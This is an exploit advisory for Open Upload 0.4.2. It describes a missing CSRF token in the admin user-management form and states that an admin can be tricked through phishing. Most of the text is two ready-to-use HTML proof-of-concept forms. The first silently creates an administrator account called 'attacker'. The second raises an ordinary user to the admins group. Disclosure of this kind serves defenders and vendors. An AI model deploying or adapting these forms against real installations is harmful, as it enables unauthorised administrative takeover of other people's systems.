================================================================================================================
Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
================================================================================================================# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit# Exploit Author : Vinesh Redkar (@b0rn2pwn) # Email : vineshredkar89[at]gmail[d0t]com# Date: 21/07/2016# Vendor Homepage: http://openupload.sourceforge.net/# Software Link: https://sourceforge.net/projects/openupload/# Version: 0.4.2# Tested on: Windows 10 OS
Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering).
Once exploited, the attacker can login as the admin using the username and the password he posted in the form.======================CSRF POC (Adding New user with Admin Privileges)==================================
CSRF PoC Code
<html><head><title>Remote Admin Add CSRF Exploit</title></head><H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2><body><form action="http://127.0.0.1/openupload/index.php" method="POST"><inputtype="hidden" name="action" value="adminusers"/><inputtype="hidden" name="step" value="2"/><inputtype="hidden" name="adduserlogin" value="attacker"/><inputtype="hidden" name="adduserpassword" value="attacker"/><inputtype="hidden" name="adduserrepassword" value="attacker"/><inputtype="hidden" name="addusername" value="attacker"/><inputtype="hidden" name="adduseremail" value="attacker@gmail.com"/><inputtype="hidden" name="addusergroup" value="admins"/><inputtype="hidden" name="adduserlang" value="en"/><inputtype="hidden" name="adduseractive" value="1"/><inputtype="submit" value="Submit request"/></form></body></html>======================CSRF POC (Changing privileges from normal user to administer)==================================<html><head><title>Change privilege normal user to administer CSRF Exploit</title></head><H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2><body><form action="http://127.0.0.1/openupload/index.php" method="POST"><inputtype="hidden" name="action" value="adminusers"/><inputtype="hidden" name="step" value="3"/><inputtype="hidden" name="login" value="normal user"/><inputtype="hidden" name="edituserpassword" value=""/><inputtype="hidden" name="edituserrepassword" value=""/><inputtype="hidden" name="editusername" value="normaluser"/><inputtype="hidden" name="edituseremail" value="normaluser@gmail.com"/><inputtype="hidden" name="editusergroup" value="admins"/><inputtype="hidden" name="edituserlang" value="en"/><inputtype="hidden" name="edituseractive" value="1"/><inputtype="submit" value="Submit request"/></form></body></html>
